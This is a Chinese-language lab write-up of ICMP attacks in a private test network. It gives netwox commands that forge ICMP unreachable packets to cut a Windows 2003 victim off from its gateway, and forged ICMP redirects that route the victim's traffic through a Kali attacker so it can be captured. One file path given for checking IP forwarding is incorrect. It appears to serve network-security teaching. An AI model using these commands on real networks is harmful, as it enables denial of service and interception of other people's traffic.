一、实验拓扑
二、拓扑介绍
局域网:172.24.8.0
攻击者kali:172.24.8.129
受害者win2003:172.24.8.253
PC2:172.24.8.254
外网主机:10.1.1.100
三、实验步骤
1)首先测试设备之间的连通性(win2003为例)
2)ICMP不可达,实现win2003主机访问外网的时候都出现目标主机不可达的情况
即只需要做到win2003在访问172.24.8.2网关时出现主机不可达即可。
使用netwox 82号工具来实现(可以同时开几个终端来增强效果):
sudo netwox 82 -f "host 172.24.8.253" -i "172.24.8.2"
-f:进行筛选
-i:目标地址
查看效果:
可以明显看到其中间断的出现了一些目标不可达的报文,说名实验成功。
3)ICMP重定向,实现当win2003访问外网时,需要先将报文交给攻击者kali后,再由kali转发到网关,最后再到外网主机。
实现这一目标,只需将将win2003的默认网关设为攻击者kali的主机地址即可,同时需要在kali上开启路由转发功能。
①开启路由转发功能
vim /etc/sysctl.conf //编辑sysctl.confnet.ipv4.ip_forward = 1 //设置为1
sysctl -p /etc/sysctl.conf //立即生效不需要重启
cat /etc/sys/net/ipv4/ipv4_forward //查看值是否为1,为1表示修改完成,为0表示没有修改
②使用netwox的86号工具来实现
sudo netwox 86 -f "host 172.24.8.253" -g "172.24.8.129" -i "172.24.8.2"
-f:路由筛选
-g:新指定的网关地址
-i:原来的网关地址
在攻击者kali上面进行抓包,可以抓到ICMP重定向的包和要传输的数据包,也就是说,可以在kali上面获取从win2003发往外网的数据包。